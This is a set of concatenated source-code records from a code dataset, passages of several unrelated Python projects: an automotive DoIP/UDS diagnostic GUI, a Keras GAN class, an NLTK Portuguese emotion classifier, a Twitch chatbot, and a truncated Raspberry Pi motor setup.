self.multiLineTableWidget.setVerticalHeaderItem(1)\n # vh = self.multiLineTableWidget.takeVerticalHeaderItem(2)\n # # vh.setText('2222')\n # print(self.multiLineTableWidget.rowCount())\n\n # for i in range(5):\n # self.multiLineTableWidget.insertRow(i)\n # print(self.multiLineTableWidget.rowCount())\n pass\n\n def __init_uds_client_action(self):\n try:\n if not self.__doip_connection_status:\n\n # self.ecu = Uds(transportProtocol=\"DoIP\", ecu_ip=\"127.0.0.1\")\n self.__init_uds_settings()\n self.ecu = Uds(transportProtocol=\"DoIP\", ecu_ip=self.__ecu_ip_address, ecu_logical_address=self.__ecu_logical_address, client_logical_address=self.__tester_logical_address)\n # client_ip_addr, client_port = self.ecu.tp.get_lcoal_doip_connection_info()\n client_ip_addr, client_port = self.ecu.tp.DoIPClient.get_local_tcp_ip_and_port()\n self.testerIpAddresslineEdit.setText(client_ip_addr)\n # self.__udsThread = Thread(target=self.__build_uds_connection)\n # self.__udsThread.start()\n\n self.append_msg_to_infoPrintBrowser('doip connect ok!')\n self.__set_pushbutton_status(True)\n self.buildConnectionButton.setText('断开连接')\n self.__doip_connection_status = True\n else:\n self.ecu.disconnect()\n self.buildConnectionButton.setText('建立连接')\n self.__set_pushbutton_status(False)\n self.__doip_connection_status = False\n self.append_msg_to_infoPrintBrowser('doip disconnect ok!')\n # print('doip disconnect ok!')\n except (ConnectionRefusedError, TimeoutError) as e:\n # print('doip connect error!')\n self.append_msg_to_infoPrintBrowser('doip connect error!')\n\n # def __build_uds_connection(self):\n # self.ecu = Uds(transportProtocol=\"DoIP\", ecu_ip=\"127.0.0.1\")\n\n def __send_diagMsg_action(self):\n print('send diag msg')\n sid = self.sidSeclectBox.currentText()\n # ecuName = self.ecuSeclectBox.currentText()\n ecuIndex = self.ecuSeclectBox.currentIndex()\n ecuLogicAddress = get_ecu_logical_address_by_index(ecuIndex)\n self.ecu.tp.DoIPClient.ecu_logical_address = ecuLogicAddress\n\n diagMsgContent = self.diagReqMsgLineEdit.text()\n\n self.diagReqMsgLineEdit.setText(Main_Ui.get_byte_split_msg(diagMsgContent))\n\n self.__send_diagMsg_req_and_get_response(sid, diagMsgContent)\n\n def __add_Line_PushButton_action(self):\n rowCnt = self.multiLineTableWidget.rowCount()\n sid = self.sidLineEdit.text()\n diagData = self.diagDataLineEdit.text()\n\n self.multiLineTableWidget.insertRow(rowCnt)\n self.multiLineTableWidget.setItem(rowCnt, 0, QTableWidgetItem(sid))\n self.multiLineTableWidget.setItem(rowCnt, 1, QTableWidgetItem(diagData))\n\n\n def __clear_tableWidget_PushButton_action(self):\n self.multiLineTableWidget.setRowCount(0)\n\n def __multi_line_send_PushButton_action(self):\n for i in range(self.multiLineTableWidget.rowCount()):\n sid = self.multiLineTableWidget.item(i, 0).text()\n diagData = self.multiLineTableWidget.item(i, 1).text()\n # diagMsg = sid + diagData\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Tx: ', Main_Ui.get_byte_split_msg(diagMsg)))\n self.__send_diagMsg_req_and_get_response(sid, diagData)\n\n def __clear_all_print_textBrowser(self):\n self.DiagMsgPrintBrowser.clear()\n self.InfoPrintBrowser.clear()\n\n def __send_diagMsg_req_and_get_response(self, sid, diagData):\n \"\"\"\n\n :param sid:\n :param diagData:\n \"\"\"\n diagMsgReq = sid + diagData\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Tx: ', Main_Ui.get_byte_split_msg(diagMsgReq)))\n diagMsgReq = Main_Ui.str_DiagMsg2_hex(diagMsgReq)\n\n if diagMsgReq:\n if diagMsgReq[0] == 0x27 and diagMsgReq[1] == 0x01:\n # response = self.ecu.send(diagMsgReq)\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Rx: ', Main_Ui.get_byte_split_msg( Main_Ui.hex_DiagMsg2_str(response))))\n # self.__print_req_response_to_diagMsgPrintBrowser(diagMsgReq, response)\n response = self.__send_doip_msg(diagMsgReq)\n if len(response) == 6 and response[0] == 0x67 and response[1] == 0x01:\n reqWithKey = [0x27, 0x02]\n key = keyGen(response[2:])\n reqWithKey.extend(key)\n # response = self.ecu.send(reqWithKey)\n # self.__print_req_response_to_diagMsgPrintBrowser(reqWithKey, response)\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Rx: ', Main_Ui.get_byte_split_msg(Main_Ui.hex_DiagMsg2_str(response))))\n self.__send_doip_msg(reqWithKey)\n else:\n # response = self.ecu.send(diagMsgReq)\n # self.__print_req_response_to_diagMsgPrintBrowser(diagMsgReq, response)\n # print(response)\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Rx: ', Main_Ui.get_byte_split_msg( Main_Ui.hex_DiagMsg2_str(response))))\n self.__send_doip_msg(diagMsgReq)\n\n def __send_doip_msg(self, diagMsgReq):\n response = self.ecu.send(diagMsgReq)\n self.__print_req_response_to_diagMsgPrintBrowser(diagMsgReq, response)\n\n return response\n\n def __print_req_response_to_diagMsgPrintBrowser(self, diagMsgReq, response):\n self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Tx: ', Main_Ui.get_byte_split_msg(self.hex_DiagMsg2_str(diagMsgReq))))\n self.append_msg_to_diagMsgPrintBrowser(\n Main_Ui.formatMsg('Rx: ', Main_Ui.get_byte_split_msg(Main_Ui.hex_DiagMsg2_str(response))))\n\n def append_msg_to_diagMsgPrintBrowser(self, msg):\n self.__globalSignal.msgPrintBrowserSignal.emit(self.DiagMsgPrintBrowser, msg)\n\n def append_msg_to_infoPrintBrowser(self, msg):\n self.__globalSignal.msgPrintBrowserSignal.emit(self.InfoPrintBrowser, msg)\n\n\n def append_msg_to_textBrowser(self, textBrowser, msg):\n \"\"\"\n append msg to textBrowser\n :param textBrowser:\n :param msg:\n \"\"\"\n assert isinstance(textBrowser, QTextBrowser)\n textBrowser.append(msg)\n textBrowser.ensureCursorVisible()\n\n @staticmethod\n def get_byte_split_msg(msg):\n assert isinstance(msg, str)\n msg = msg.replace(' ', '')\n\n if(len(msg)%2):\n msg = msg + '0'\n\n msg = [msg[i:i+2] for i in range(0, len(msg), 2)]\n\n return ' '.join(msg)\n\n @staticmethod\n def formatMsg(fmt, msg):\n return '{0}{1}'.format(fmt, msg)\n\n @staticmethod\n def str_DiagMsg2_hex(strMsg):\n try:\n strMsg = Main_Ui.get_byte_split_msg(strMsg)\n strMsg = strMsg.split(' ')\n # print(strMsg)\n hexMsg = [(int(x, 16)) for x in strMsg]\n # print(hexMsg)\n except TypeError as e:\n hexMsg = None\n\n return hexMsg\n\n @staticmethod\n def hex_DiagMsg2_str(hexMsg):\n\n\n diagRespData = [hex(x)[2:] for x in hexMsg]\n diagRespData = [x.zfill(2) for x in diagRespData]\n\n return ''.join(diagRespData)\n\nclass GlobalSigals(QObject):\n # 定义一种信号,两个参数 类型分别是: QTextBrowser 和 字符串\n # 调用 emit方法 发信号时,传入参数 必须是这里指定的 参数类型\n msgPrintBrowserSignal = Signal(QTextBrowser, str)\n\n # 还可以定义其他种类的信号\n #update_table = Signal(str)\n\n # changeConnectionButtor = Signal(QPushButton, str)\n\n\ndef keyGen(seed_input):\n #print(os.getcwd())\n lib = cdll.LoadLibrary(os.getcwd() + '\\libkeygen.so')\n seed_data = c_char * 4\n seed = seed_data()\n\n for i in range(4):\n seed[i] = seed_input[i]\n\n key_data = c_char * 4\n key = key_data()\n\n lib.GenerateKeyEx(seed, 4, key)\n\n key_output = []\n for i in range(4):\n key_output.append(key[i][0])\n\n return key_output","sub_path":"src/doip_connect/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":11576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"49871670","text":"palette = [\"#1F77B4\",\"#FF7F0E\",\"#2CA02C\", \"#00A3E0\", '#4943cf', '#1eeca8', '#e52761', '#490b04', '#ffb3ba', '#ffdfba', '#d0d04a', '#baffc9', '#bae1ff', '#a3c1ad', '#a0d6b4', '#5f9ea0', '#317873', '#49796b',\n '#ffb3ba', '#ffdfba', '#d0d04a', '#baffc9', '#bae1ff', '#a3c1ad', '#a0d6b4', '#5f9ea0', '#317873', '#49796b', '#ffb3ba', '#ffdfba', '#d0d04a', '#baffc9', '#bae1ff',\n '#a3c1ad', '#a0d6b4', '#5f9ea0', '#317873', '#49796b', '#ffb3ba', '#ffdfba', '#d0d04a', '#baffc9', '#bae1ff', '#a3c1ad', '#a0d6b4']\nimport sys\nsys.path.insert(0, 'C:/Users/Max Power/OneDrive/ponte/programmi/python/progetto2/AJ_lib')\nfrom AJ_draw import disegna as ds\n\n# train a generative adversarial network on a one-dimensional function\n# from keras.models import Sequential\n# from keras.layers import Dense, LeakyReLU, Reshape, Flatten, Conv1D, Dropout\n# from keras.models import load_model\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv1D, LeakyReLU, Dropout, Reshape, Conv1DTranspose, Flatten\n\nimport numpy as np\nimport pandas as pd\n\nclass learning_gan:\n\n # ███ ███ ██████ ██████ ███████ ██ ███████\n # ████ ████ ██ ██ ██ ██ ██ ██ ██\n # ██ ████ ██ ██ ██ ██ ██ █████ ██ ███████\n # ██ ██ ██ ██ ██ ██ ██ ██ ██ ██\n # ██ ██ ██████ ██████ ███████ ███████ ███████\n\n # define the standalone discriminator model\n def define_discriminator(self, n_inputs=2):\n '''\n modello discriminatore, testa del modello, impara a distinguere tra il dato reale e quello generato.\n n_inputs: (int) dimensione del dato reale\n return model: il modello\n '''\n model = Sequential()\n model.add(Dense(int(n_inputs/2), activation='relu', kernel_initializer='he_uniform', input_dim=n_inputs))\n model.add(Dropout(0.4))\n model.add(Dense(int(n_inputs/10), activation='relu', kernel_initializer='he_uniform'))\n model.add(Dropout(0.4))\n model.add(Dense(int(n_inputs/100), activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(1, activation='sigmoid'))\n # compile model\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n # define the standalone generator model\n def define_generator(self, latent_dim, n_outputs=2):\n '''\n modello generatore, coda del modello, impara a creare un dato che possa essere confuso con un dato reale.\n latent_dim: (int) dimensione dello spazio latente, che sono numeri random\n n_outputs: (int) dimensione del dato reale, questo e' il dato generato che vuole imitare il dato reale\n return: model\n '''\n model = Sequential()\n model.add(Dense(int(n_outputs*1.5), activation='relu', kernel_initializer='he_uniform', input_dim=latent_dim))\n model.add(Dropout(0.4))\n model.add(Dense(int(n_outputs/10), activation='relu', kernel_initializer='he_uniform'))\n model.add(Dropout(0.4))\n model.add(Dense(int(n_outputs/100), activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(n_outputs, activation='linear'))\n return model\n\n # define the standalone generator model\n def define_generator_tf2(latent_dim, n_outputs=2):\n '''\n questo modello funziona solo con TF2\n modello generatore, coda del modello, impara a creare un dato che possa essere confuso con un dato reale.\n latent_dim: (int) dimensione dello spazio latente, che sono numeri random\n n_outputs: (int) dimensione del dato reale, questo e' il dato generato che vuole imitare il dato reale\n return: model\n '''\n\n model = Sequential()\n\n # foundation for 7x7 image\n n_nodes = 128 * int(n_outputs/4)\n\n model.add(Dense(n_nodes, input_dim=latent_dim))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((int(n_outputs/4), 128)))\n\n # upsample to 14x14\n model.add(Conv1DTranspose(128, 4, strides=2, padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n\n # upsample to 28x28\n model.add(Conv1DTranspose(128, 4, strides=2, padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Conv1D(1, int(n_outputs/4), activation='sigmoid', padding='same'))\n model.add(Flatten())\n return model\n\n # define the combined generator and discriminator model, for updating the generator\n def define_gan(self, generator, discriminator):\n '''\n modello completo di GAN, generato concatenando il generatore e il discriminatore.\n Il disciminatore ha i pesi fissato, cosi che durante il training solo il generatore viene aggiornato\n generator: modello del generatore\n discriminator: modello del discriminatore\n return: modello\n '''\n # make weights in the discriminator not trainable\n discriminator.trainable = False\n # connect them\n model = Sequential()\n # add generator\n model.add(generator)\n # add the discriminator\n model.add(discriminator)\n # compile model\n model.compile(loss='binary_crossentropy', optimizer='adam')\n return model\n\n\n # ██████ █████ ████████ █████ ██████ ███████ ███ ██ ███████ ██████ █████ ████████ ██████ ██████\n # ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██\n # ██ ██ ███████ ██ ███████ ██ ███ █████ ██ ██ ██ █████ ██████ ███████ ██ ██ ██ ██████\n # ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██\n # ██████ ██ ██ ██ ██ ██ ██████ ███████ ██ ████ ███████ ██ ██ ██ ██ ██ ██████ ██ ██\n\n\n # generate n real samples with class labels\n def generate_real_samples(self, data, n):\n '''\n selezione un sotto campione random dei dati.\n data: dati del campione, in formato Pandas\n n: (int) numero di campioni da selezionare\n return: data_selection, pandas dataframe con n campioni dentro, y, numpy array con tutti 1 e n campioni dentro\n (y rappresenta la classe dei dati, 1 indica che sono quelli reali)\n '''\n data_selection = data.sample(n).reset_index(drop=True)\n y = np.ones((n, 1))\n return data_selection, y\n\n # generate points in latent space as input for the generator\n def generate_latent_points(self, latent_dim, n):\n '''\n genera punti dallo spazio latente. Altro non sono che valori con distribuzione gaussiana\n latent_dim: (int) dimensione del vettore da dare in pasto al generatore\n n: (int) numero di campioni da generare\n return: x_input, numpy array con n campioni di latent_dim valori random\n '''\n # generate points in the latent space\n x_input = np.random.randn(latent_dim * n)\n # reshape into a batch of inputs for the network\n x_input = x_input.reshape(n, latent_dim)\n return x_input\n\n # use the generator to generate n fake examples, with class labels\n def generate_fake_samples(self, generator, latent_dim, n):\n '''\n generatore di campioni falsi, usa il modello generatore per predirre un nuovo set di dati che quindi sono inventati\n generator: modello del generatore\n latent_dim: (int) dimensione del vettore dello spazio latente, deve essere lungo quanto il primo layer del modello\n n: (int) numero di campioni da generare\n return: x, numpy array con il dato inventato, y numpy array con tutti 0 dentro e lungo n, rappresenta il label dei dati finti\n '''\n # generate points in latent space\n x_input = self.generate_latent_points(latent_dim, n)\n # predict outputs\n X = generator.predict(x_input)\n # create class labels\n y = np.zeros((n, 1))\n return X, y\n\n\n # ████████ ██████ █████ ██ ███ ██ ██ ███ ██ ██████\n # ██ ██ ██ ██ ██ ██ ████ ██ ██ ████ ██ ██\n # ██ ██████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███\n # ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██\n # ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ████ ██████\n\n\n # evaluate the discriminator and plot real and fake points\n def summarize_performance(self, data, epoch, generator, discriminator, latent_dim, verbose=False):\n '''\n funzione per fare lo scoring del training\n data: training set in formato pandas\n epoch: (int) epoca del training\n generator: modello del generatore\n discriminator: modello del discriminatore\n latent_dim: (int) dimensione del vettore dello spazio latente, deve essere lungo quanto il primo layer del modello\n verbose: boolean, if True print accuracy and plot\n return: epoch, acc_real (accuratezza nel identificare i dati reali), acc_fake (accuratezza nel identificare i dati fake)\n '''\n # prepare real samples\n x_real, y_real = self.generate_real_samples(data, 100)\n # evaluate discriminator on real examples\n _, acc_real = discriminator.evaluate(x_real, y_real, verbose=0)\n # prepare fake examples\n x_fake, y_fake = self.generate_fake_samples(generator, latent_dim, 100)\n # evaluate discriminator on fake examples\n _, acc_fake = discriminator.evaluate(x_fake, y_fake, verbose=0)\n # summarize discriminator performance\n\n x_real, y_real = self.generate_real_samples(data, 1)\n x_fake, y_fake = self.generate_fake_samples(generator, latent_dim, 1)\n\n if verbose:\n print('epoch: ',epoch)\n print('how good the discriminator is to evaluate the real example',acc_real)\n print('how good the discriminator is to evaluate the fake example',acc_fake)\n # scatter plot real and fake data points\n ds().nuova_fig(1)\n X1 = np.arange(len(x_real.T[0]))\n ds().dati(x = X1, y = x_real.T[0], colore = palette[0], descrizione=\"real\")\n ds().dati(x = X1, y = x_fake.T, colore = palette[1], descrizione=\"fake\")\n ds().legenda()\n ds().porta_a_finestra()\n return epoch, acc_real, acc_fake\n\n # train the generator and discriminator\n def train(self, data, latent_dim, n_epochs=10000, n_batch=128, n_eval=2000, verbose = False, save = False):\n '''\n training function.\n data: training set in formato pandas\n latent_dim: (int) dimensione del vettore dello spazio latente, deve essere lungo quanto il primo layer del modello\n n_epochs: (int) numero totale di epoche per il training\n n_batch: (int) numero di campioni da usare per il training, se usato un numero maggiore alla dimensione di data, il valore viene convertito alla lunghezza di data\n n_eval: (int) ogni quante epoche viene salvato il modello e valutata l'accuratezza\n verbose: (boolean) if True viene printata l'accuratezza ogni n_eval e generato il plot\n save: (boolean) if True viene salvato il modello ogni n_eval\n '''\n size_single_sample = data.shape[1]\n # # create the discriminator\n discriminator = self.define_discriminator(n_inputs = size_single_sample)\n # # create the generator\n generator = self.define_generator(latent_dim, n_outputs = size_single_sample)\n # # create the gan\n gan_model = self.define_gan(generator, discriminator)\n\n # determine half the size of one batch, for updating the discriminator\n if n_batch>data.shape[1]:\n n_batch = data.shape[1]\n half_batch = int(n_batch / 2)\n sum_epoch, sum_acc_real, sum_acc_fake = [], [], []\n sum_d_loss_real, sum_d_loss_fake, sum_g_loss = [], [], []\n # manually enumerate epochs\n for i in range(n_epochs):\n # prepare real samples\n x_real, y_real = self.generate_real_samples(data, half_batch)\n # prepare fake examples\n x_fake, y_fake = self.generate_fake_samples(generator, latent_dim, half_batch)\n # update discriminator\n d_loss_real = discriminator.train_on_batch(x_real, y_real)\n d_loss_fake = discriminator.train_on_batch(x_fake, y_fake)\n # prepare points in latent space as input for the generator\n x_gan = self.generate_latent_points(latent_dim, n_batch)\n # create inverted labels for the fake samples\n y_gan = np.ones((n_batch, 1))\n # update the generator via the discriminator✬s error\n g_loss = gan_model.train_on_batch(x_gan, y_gan)\n # evaluate the model every n_eval epochs\n if (i+1) % n_eval == 0:\n temp_epoch, temp_real, temp_fake = self.summarize_performance(data, i, generator, discriminator, latent_dim, verbose)\n sum_epoch.append(temp_epoch)\n sum_acc_real.append(temp_real)\n sum_acc_fake.append(temp_fake)\n sum_d_loss_real.append(d_loss_real[0])\n sum_d_loss_fake.append(d_loss_fake[0])\n sum_g_loss.append(g_loss)\n if save:\n self.save_model(generator, filename = 'generator_model_%03d.h5' % (i + 1))\n ds().nuova_fig(4)\n ds().dati(x = sum_epoch, y = sum_acc_real, colore=palette[0], descrizione='acc real')\n ds().dati(x = sum_epoch, y = sum_acc_fake, colore=palette[1], descrizione='acc fake')\n ds().legenda()\n ds().porta_a_finestra()\n\n ds().nuova_fig(5)\n ds().dati(x = sum_epoch, y = sum_d_loss_real, colore=palette[0], descrizione='loss dis real')\n ds().dati(x = sum_epoch, y = sum_d_loss_fake, colore=palette[1], descrizione='loss dis fake')\n ds().legenda()\n ds().porta_a_finestra()\n\n ds().nuova_fig(5)\n ds().dati(x = sum_epoch, y = sum_g_loss, colore=palette[2], descrizione='loss gan')\n ds().legenda()\n ds().porta_a_finestra()\n\n\n # ███████ █████ ██ ██ ███████\n # ██ ██ ██ ██ ██ ██\n # ███████ ███████ ██ ██ █████\n # ██ ██ ██ ██ ██ ██\n # ███████ ██ ██ ████ ███████\n\n\n def save_model(self, model, filename = 'model'):\n '''\n salva il modello in un formato h5\n model: modello\n filename: nome del file\n '''\n model.save(filename)\n\n def load_model(self, filename):\n '''\n load il modello\n filename: nome del file con estensione\n '''\n return load_model(filename)\n","sub_path":"AJ_models_GAN_tf2.py","file_name":"AJ_models_GAN_tf2.py","file_ext":"py","file_size_in_byte":16073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"388209406","text":"import nltk\n\nbase = [('eu sou admirada por muitos','alegria'),\n ('me sinto completamente amado','alegria'),\n ('amar e maravilhoso','alegria'),\n ('estou me sentindo muito animado novamente','alegria'),\n ('eu estou muito bem hoje','alegria'),\n ('que belo dia para dirigir um carro novo','alegria'),\n ('o dia está muito bonito','alegria'),\n ('estou contente com o resultado do teste que fiz no dia de ontem','alegria'),\n ('o amor e lindo','alegria'),\n ('nossa amizade e amor vai durar para sempre', 'alegria'),\n ('estou amedrontado', 'medo'),\n ('ele esta me ameacando a dias', 'medo'),\n ('isso me deixa apavorada', 'medo'),\n ('este lugar e apavorante', 'medo'),\n ('se perdermos outro jogo seremos eliminados e isso me deixa com pavor', 'medo'),\n ('tome cuidado com o lobisomem', 'medo'),\n ('se eles descobrirem estamos encrencados', 'medo'),\n ('estou tremendo de medo', 'medo'),\n ('eu tenho muito medo dele', 'medo'),\n ('estou com medo do resultado dos meus testes', 'medo')]\n\n# 1 Base de dados sem stop words\n#print(base)\n#print(base[1])\n\n# 2 Stop words\n\nstopwords = ['a', 'agora', 'algum', 'alguma', 'aquele', 'aqueles', 'de', 'deu', 'do', 'e', 'estou', 'esta', 'esta',\n 'ir', 'meu', 'muito', 'mesmo', 'no', 'nossa', 'o', 'outro', 'para', 'que', 'sem', 'talvez', 'tem', 'tendo',\n 'tenha', 'teve', 'tive', 'todo', 'um', 'uma', 'umas', 'uns', 'vou']\n\nstopwordsnltk = nltk.corpus.stopwords.words('portuguese')\n#print(stopwordsnltk)\n\ndef removestopwords(texto):\n frases = []\n for (palavras, emocao) in texto:\n semstop = [p for p in palavras.split() if p not in stopwords]\n frases.append((semstop, emocao))\n return frases\n\n#print(removestopwords(base))\n\n# 3 Stop words nltk\n\n# 4 Stemming\n\ndef aplicastemmer(texto):\n stemmer = nltk.stem.RSLPStemmer()\n frasesstemming = []\n for (palavras, emocao) in texto:\n comstemming = [str(stemmer.stem(p)) for p in palavras.split() if p not in stopwordsnltk]\n frasesstemming.append((comstemming, emocao))\n return frasesstemming\n\nfrasescomstemming = aplicastemmer(base)\nprint(frasescomstemming)\n\n# video\n\ndef buscapalavras(frases):\n todaspalavras = []\n for (palavras, emocao) in frases:\n todaspalavras.extend(palavras)\n return todaspalavras\n\npalavras = buscapalavras(frasescomstemming)\n#print(palavras)\n\n# frequencia radical\n\ndef buscafrequencia(palavras):\n palavras = nltk.FreqDist(palavras)\n return palavras\n\nfrequencia = buscafrequencia(palavras)\n#print(frequencia.most_common(50))\n\n# com base na frequencia, extrair a lista final sem repeticao\n\ndef buscapalavrasunicas(frequencia):\n freq = frequencia.keys()\n return freq\n\npalavrasunicas = buscapalavrasunicas(frequencia)\n#print(palavrasunicas)\n\n# extraindo as características de cada frase\n\ndef extratorpalavras(documento):\n doc = set(documento)\n caracteristicas = {}\n for palavra in palavrasunicas:\n caracteristicas['%s' % palavra] = (palavra in doc)\n return caracteristicas\n\ncaracteristicasfrase = extratorpalavras(['tim', 'gole', 'nov'])\n#print(caracteristicasfrase)\n\nbasecompleta = nltk.classify.apply_features(extratorpalavras, frasescomstemming)\n#print(basecompleta[0])\n\n'''\nclassificador = nltk.NaiveBayesClassifier.train(basecompleta)\n\nteste = 'genial'\nteste_stemming = []\nfor (palavras) in teste.split():\n filtrado = [e for e in palavras.split()]\n # teste_stemming.append(str(stemmer.stem(filtrado[0])))\n#print(teste_stemming)\nprint(classificador.classify(extrator_caracteristicas(teste_stemming)))\n'''","sub_path":"ciencia_de_dados/iaexpert/Mineração de Emoção em Textos Python NLTK/data/mineracao.py","file_name":"mineracao.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"647306287","text":"############################################################################\r\n# Chris Given's Twitch Chatbot\r\n# Last modified: 7:10 AM, 8/27/18\r\n# Recent changelog:\r\n# - Added cooldowns for data collection and commands\r\n# - Added data collection intervals:\r\n# - Allows the game to be saved as an instance variable\r\n# - So when people ask for game you can prevent another API call\r\n# - NOTE: added dependency for schedule module\r\nimport irc.bot\r\nimport requests\r\nfrom time import gmtime, strftime, time\r\nfrom schedule import every, run_pending\r\n\r\nclass Bot(irc.bot.SingleServerIRCBot):\r\n def __init__(self, username, clientID, token, channel):\r\n self.client_id = clientID\r\n self.token = token\r\n self.channel = \"#\" + channel\r\n self.game = None\r\n self.title = None\r\n\r\n self.lastCommandTime = time()\r\n self.commands = [\"game\", \"ribbit\",]\r\n\r\n # Get the channel id for API-based functions\r\n url = \"https://api.twitch.tv/helix/users?login={}\".format(channel)\r\n headers = {\"Client-ID\": clientID}\r\n response = requests.get(url, headers = headers).json()\r\n self.channelID = response[\"data\"][0][\"id\"]\r\n\r\n # Cooldowns for certain functions\r\n # Data collection: Get game and title every n seconds\r\n # - NOTE: You only get 30 API calls per minute without a bearer token.\r\n # Commands: Bot will not respond if a command has been issued in n seconds\r\n self.cooldowns = {\"dataCollection\": 60,\r\n \"commands\": 3,}\r\n self.collect()\r\n every(self.cooldowns[\"dataCollection\"]).seconds.do(self.collect)\r\n\r\n # Information for Twitch IRC server\r\n server = \"irc.chat.twitch.tv\"\r\n port = 6667\r\n irc.bot.SingleServerIRCBot.__init__(self, [(server, port, \"oauth:\" + token)], username, username)\r\n\r\n # ========== Event Handlers ========== #\r\n # These handle messages from the IRC server\r\n # USERNOTICE: (Re)subscriptions, raids, and rituals\r\n # CLEARCHAT: Bans and timeouts\r\n # ROOMSTATE: Changes to room (slow mode, r9k, etc.)\r\n # HOSTTARGET: Channel hosts/unhosts\r\n # PUBMSG: Public message (all twitch chat msgs come here)\r\n # All handlers have a c (connection) and e (event) parameter.\r\n # The events hold important information about each message.\r\n # The connection is required to send messages (c.privmsg).\r\n def on_welcome(self, c, e):\r\n c.cap('REQ', ':twitch.tv/membership')\r\n c.cap('REQ', ':twitch.tv/tags')\r\n c.cap('REQ', ':twitch.tv/commands')\r\n c.join(self.channel)\r\n\r\n def on_usernotice(self, c, e):\r\n months = 0\r\n name = \"\"\r\n for tag in e.tags:\r\n if tag[\"key\"] == \"msg-param-months\":\r\n months = int(tag[\"value\"])\r\n if tag[\"key\"] == \"display-name\":\r\n name = tag[\"value\"]\r\n if months >= 3:\r\n print(\"PepoDance {} has subscribed for {} months! PepoDance\".format(name, months))\r\n\r\n def on_clearchat(self, c, e):\r\n target = e.arguments[0]\r\n ban = False if \"ban-duration\" in e.tags[0].values() else True\r\n if ban:\r\n c.privmsg(self.channel, \"{} has been obliterated.\".format(target))\r\n\r\n def on_roomstate(self, c, e):\r\n pass\r\n\r\n def on_hosttarget(self, c, e):\r\n pass\r\n\r\n def on_pubmsg(self, c, e):\r\n run_pending()\r\n message = \" \".join(e.arguments)\r\n name = e.tags[2][\"value\"]\r\n currentTime = strftime(\"%H:%M:%S\", gmtime())\r\n print(currentTime, \"-\", name + \":\", message)\r\n if message[0] == \"!\" and time() - self.lastCommandTime > self.cooldowns[\"commands\"]:\r\n c.privmsg(self.channel, self.do_command(e.arguments, name))\r\n\r\n # Collect game and title information\r\n # This saves it so it can be on demand when someone asks for it instead of having to wait for API calls\r\n # which might slow down the bot.\r\n def collect(self):\r\n response = requests.get(\"https://api.twitch.tv/helix/streams?user_id={}\".format(self.channelID),\r\n headers={\"Client-ID\": self.client_id}).json()\r\n try:\r\n gameID = response[\"data\"][0][\"game_id\"]\r\n response = requests.get(\"https://api.twitch.tv/helix/games?id={}\".format(gameID),\r\n headers={\"Client-ID\": self.client_id}).json()\r\n try:\r\n self.game = response[\"data\"][0][\"name\"]\r\n except KeyError:\r\n self.game = \"an unlisted game\"\r\n except IndexError:\r\n self.game = \"offline\"\r\n\r\n # Execute a command when the first character of a chat message is \"!\".\r\n def do_command(self, arguments, name):\r\n command = arguments[0][1:]\r\n if command not in self.commands:\r\n return\r\n elif command == \"ribbit\":\r\n return \"/me ribbits.\"\r\n elif command == \"game\":\r\n return \"{} is playing {}.\".format(self.channel[1:], self.game)\r\n self.lastCommandTime = time()\r\n\r\ndef main():\r\n with open(\"client.txt\") as cl:\r\n client = cl.read()\r\n with open(\"token.txt\") as tok:\r\n token = tok.read()\r\n username = \"codetoad\"\r\n channel = \"codetoad\"\r\n bot = Bot(username, client, token, channel)\r\n try:\r\n bot.start()\r\n except KeyboardInterrupt:\r\n bot.disconnect()\r\n print()\r\n exit()\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"updated/chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"179840394","text":"import RPi.GPIO as GPIO\nimport time\n\ndef setup():\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n\n global MotorLeft_A, MotorLeft_B, MotorLeft_PWM\n global MotorRight_A, MotorRight_B, MotorRight_PWM \n MotorLeft_A = 12\n MotorLeft_B = 11\n MotorLeft_PWM = 35\n MotorRight_A = 15\n MotorRight_B = 13\n MotorRight_PWM = 37\n\n global trig, echo\n trig = 33\n echo = 31\n\n global otd, otb, ota, otc, ote\n otd = 16\n otb = 18\n ota = 22\n otc = 40\n ote = 32\n\n GPIO.setup(MotorLeft_A, GPIO.OUT)\n GPIO.setup(MotorLeft_B, GPIO.OUT)\n GPIO.setup(MotorLeft_PWM, GPIO.OUT)\n GPIO.setup(MotorRight_A, GPIO.OUT)\n GPIO.setup(MotorRight_B, GPIO.OUT)\n GPIO.setup(MotorRight_PWM, GPIO.OUT)\n\n GPIO.setup(trig, GPIO.OUT)\n GPIO.setup(echo, GPIO.IN)\n\n GPIO.setup(otd, GPIO.IN)\n GPIO.setup(otb, GPIO.IN)\n GPIO.setup(ota, GPIO.IN)\n GPIO.setup(otc, GPIO.IN)\n GPIO.setup(ote, GPIO.IN)\n\n global LeftPwm, RightPwm\n 